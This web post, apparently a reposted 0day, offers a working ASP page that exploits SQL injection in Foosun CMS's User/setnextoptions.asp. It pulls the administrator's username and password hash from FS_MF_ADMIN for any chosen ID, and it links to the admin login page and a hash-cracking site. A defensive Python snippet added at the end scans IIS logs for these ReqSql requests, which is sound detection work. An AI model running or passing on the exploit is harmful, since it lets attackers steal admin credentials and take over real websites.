Save the code below as an ASP file and run it in a local ASP environment.
<head><title>foosun cms 0day exploits</title>
</head>
<body>
<%
web=request("web")
id=request("id")
%>
关键字:会员注册step 1 of 4 step<br>
<form action='' method=post>
输入地址:<input type=text size=50 id=web name=web value="<%=web%>"><br>
要暴的ID号(默认是1)<input type=text size=3 name=id value="<%=id%>">ID为1的是超级管理员<br>
<input type=submit value="我要暴">
</form>
<form>
<%
function bin2str(bin)
dim tmp,ustr
tmp=""
for i=1 to LenB(bin)-1
ustr=AscB(MidB(bin,i,1))
if ustr>127 then
i=i+1
tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))
else
tmp=tmp&chr(ustr)
end if
next
bin2str=tmp
end function
webuser=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id
webpass=web&"User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id="&id
if web="" then
else
set x=server.createObject("Microsoft.XMLHTTP")
x.open "get",webuser,false
x.send
str=bin2str(x.responseBody)
response.write "你暴的网站地址:"&web&"<br><br>第"&id&"位的管理员<br>"
response.write "<br><a href='"&web&"/Admin/login.asp' target=""_blank"">网站后台地址</a><br>"
for i=126 to len(str)
mid1=mid1&mid(str,i,1)
next
response.write "<br>------------------<br>帐号:"&mid1&"<br>"
x.open "get",webpass,false
x.send
str=bin2str(x.responseBody)
for i=126 to len(str)
mid2=mid2&mid(str,i,1)
next
response.write "<br>密码:"&mid2&"<br>------------------<br>"
response.write "<br>爆出咯,可以YY了<br><br><a href='http://www.cmd5.com' target=""_blank"">cmd5</a>"
set x=nothing
end if
%>
For the specific exploitation method, refer to the source code.
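For defenders: the requests this script builds stand out in IIS logs, because each one passes a full SELECT against FS_MF_ADMIN in the ReqSql parameter of User/setnextoptions.asp. The Python below is an added example, not part of the original post; the W3C field layout, the sample log lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS W3C log sample (documentation IPs, not from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-05 10:00:01 203.0.113.7 GET /User/setnextoptions.asp EquValue=1&ReqSql=select%201,ADMIN_name,3%20from%20FS_MF_ADMIN%20where%20id=1 200
2024-01-05 10:00:02 203.0.113.7 GET /user/SetNextOptions.asp EquValue=1&ReqSql=SELECT%2520ADMIN_pass_word%2520FROM%2520FS_MF_ADMIN 200
2024-01-05 10:00:03 198.51.100.4 GET /User/login.asp - 200
2024-01-05 10:00:04 198.51.100.9 GET /User/setnextoptions.asp EquValue=1 200
"""

TARGET = "/user/setnextoptions.asp"
SQL_RE = re.compile(r"\b(select|union|insert|update|delete|exec)\b|fs_mf_admin", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding so %2520-style evasions are still matched."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_reqsql_hits(log_text):
    """Return one record per request that passes SQL text in ReqSql."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # field order is set per log file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(TARGET):
            continue
        # Parameter names are matched case-insensitively, as classic ASP does.
        params = {k.lower(): v for k, v in parse_qs(row.get("cs-uri-query", "")).items()}
        for raw in params.get("reqsql", []):
            sql = fully_decode(raw)
            if SQL_RE.search(sql):
                hits.append({"when": f"{row.get('date')} {row.get('time')}",
                             "client": row.get("c-ip"), "sql": sql})
    return hits

if __name__ == "__main__":
    for hit in find_reqsql_hits(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status on a production server means the FS_MF_ADMIN columns named in the query should be treated as potentially disclosed.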
Source: http://huairen.me/archives/68.html